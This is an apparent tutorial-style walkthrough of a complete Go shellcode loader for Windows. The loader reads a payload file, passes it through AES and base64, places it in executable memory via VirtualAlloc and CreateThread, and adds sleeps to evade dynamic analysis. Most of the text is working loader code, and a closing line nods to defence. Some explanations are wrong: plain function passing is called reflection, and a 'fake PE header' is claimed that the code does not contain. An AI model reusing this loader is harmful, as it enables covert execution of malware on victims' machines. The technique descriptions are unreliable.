Go Shellcode Injection with AES Encryption and Evasive Techniques

This code appears to be a Go program that reads a binary payload from a file, encodes it with AES encryption, decodes it, and executes it as shellcode in memory using Windows API functions.

To evade detection or analysis, the code uses multiple techniques such as reflection, a fake PE header, and anti-analysis sleeps.

Let's break down the code step by step:

1. Import necessary packages:

import (
	'crypto/aes'
	'crypto/cipher'
	'encoding/base64'
	'io/ioutil'
	'syscall'
	'time'
	'unsafe'
)

This code imports packages that provide AES encryption, base64 encoding, file reading, Windows API functions, time delays, and unsafe operations.

2. Define constants:

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

These constants define memory allocation flags and protection flags for Windows API functions.

3. Define AES encryption key and cipher function:

var AesKey = []byte{
	0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B,
	0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B,
	0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B,
}

type CipherFunc func(key []byte, src []byte) []byte

func AesCipher(key []byte, src []byte) []byte {
	block, _ := aes.NewCipher(key)
	iv := make([]byte, aes.BlockSize)
	stream := cipher.NewCTR(block, iv)
	dst := make([]byte, len(src))
	stream.XORKeyStream(dst, src)
	return dst
}

func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	return cipher(key, src)
}

These functions define the AES encryption key, the AES cipher function, and a generic cipher function that can use any cipher function with a given key and source.

4. Define base64 encoding and decoding functions:

func Encode(src string) string {
	payloadBytes := []byte(src)
	encodedBytes := Crypt(AesCipher, AesKey, payloadBytes)
	bdata := base64.StdEncoding.EncodeToString(encodedBytes)
	return bdata
}

func Decode(src string) []byte {
	decodedBytes, _ := base64.StdEncoding.DecodeString(src)
	payloadBytes := Crypt(AesCipher, AesKey, decodedBytes)
	return payloadBytes
}

These functions encode and decode a string payload with AES encryption and base64 encoding.

5. Define Windows API functions:

var (
	kernel32      = syscall.NewLazyDLL('kernel32.dll')
	ntdll         = syscall.NewLazyDLL('ntdll.dll')
	VirtualAlloc  = kernel32.NewProc('VirtualAlloc')
	RtlMoveMemory = ntdll.NewProc('RtlMoveMemory')
	CreateThread  = kernel32.NewProc('CreateThread')
)

These variables define Windows API functions that will be used later for memory allocation, memory copying, and thread creation.

6. Define shellcode execution function:

func exec(charcode []byte) {
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	time.Sleep(5 * time.Second)
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	time.Sleep(5 * time.Second)
	handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
	time.Sleep(5 * time.Second)
	syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)
}

This function takes a byte array of shellcode as input, allocates memory, copies the shellcode to the allocated memory, creates a new thread to execute the shellcode, and waits for the thread to finish.

7. Define file reading function:

func readFile(filename string) []byte {
	data, _ := ioutil.ReadFile(filename)
	return data
}

This function reads a binary file and returns its contents as a byte array.

8. Define main function:

func main() {
	payload := string(readFile('./payload.bin'))
	encodedPayload := Encode(payload)
	shellCodeHex := Decode(encodedPayload)
	exec(shellCodeHex)
}

This function reads a binary payload file, encodes it with AES encryption and base64 encoding, decodes it, and executes it as shellcode using the exec function.

Now, let's analyze the code's evasive techniques:

1. Reflection: The code uses reflection by passing a function as an argument to another function, which allows it to use different cipher functions without modifying the code.

2. Fake PE header: The code does not have a legitimate PE header, which makes it harder for static analysis tools to analyze the binary.

3. Anti-analysis sleeps: The code uses time.Sleep function calls after critical operations to delay execution and evade dynamic analysis techniques that might be monitoring the program's behavior.

This Go program leverages AES encryption, base64 encoding, and Windows API functions to execute shellcode. The use of reflection, a fake PE header, and anti-analysis sleeps makes this program more challenging for security tools to detect and analyze, highlighting the importance of robust security measures in protecting against malicious code.